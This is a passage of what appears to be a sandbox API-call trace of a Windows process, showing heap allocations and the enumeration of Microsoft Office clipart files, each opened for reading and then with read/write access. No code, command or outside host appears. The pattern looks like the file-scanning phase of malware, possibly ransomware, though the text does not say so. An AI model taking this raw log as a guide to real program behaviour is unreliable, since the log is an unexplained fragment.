ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x69aa, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00392_.WMF", cAlternateFileName="")) returned 1 [0102.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0102.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0102.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0102.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0102.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0102.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0102.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0102.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0102.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0102.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0102.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.942] AreFileApisANSI () returned 1 [0102.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0102.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.942] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.943] AreFileApisANSI () returned 1 [0102.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0102.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 69 [0102.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.943] GetFileType (hFile=0x33c) returned 0x1 [0102.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0102.944] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.944] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.944] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.944] CloseHandle (hObject=0x33c) returned 1 [0102.944] AreFileApisANSI () returned 1 [0102.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0102.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 69 [0102.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.945] GetFileType (hFile=0x33c) returned 0x1 [0102.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.945] CloseHandle (hObject=0x33c) returned 1 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0102.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0102.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.946] AreFileApisANSI () returned 1 [0102.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 69 [0102.946] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd685b3d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd685b3d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x69aa)) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0102.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.946] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd685b3d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd685b3d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b54, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00524_.WMF", cAlternateFileName="")) returned 1 [0102.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0102.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0102.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0102.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0102.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0102.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f0b8 [0102.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0102.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0102.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0102.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.947] AreFileApisANSI () returned 1 [0102.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0102.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.947] AreFileApisANSI () returned 1 [0102.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0102.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 69 [0102.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.948] GetFileType (hFile=0x33c) returned 0x1 [0102.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.948] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.948] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.948] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.949] CloseHandle (hObject=0x33c) returned 1 [0102.949] AreFileApisANSI () returned 1 [0102.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a2d0 [0102.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 69 [0102.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.949] GetFileType (hFile=0x33c) returned 0x1 [0102.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0102.949] CloseHandle (hObject=0x33c) returned 1 [0102.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0102.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.950] HeapFree (in: hHeap=0x20000, 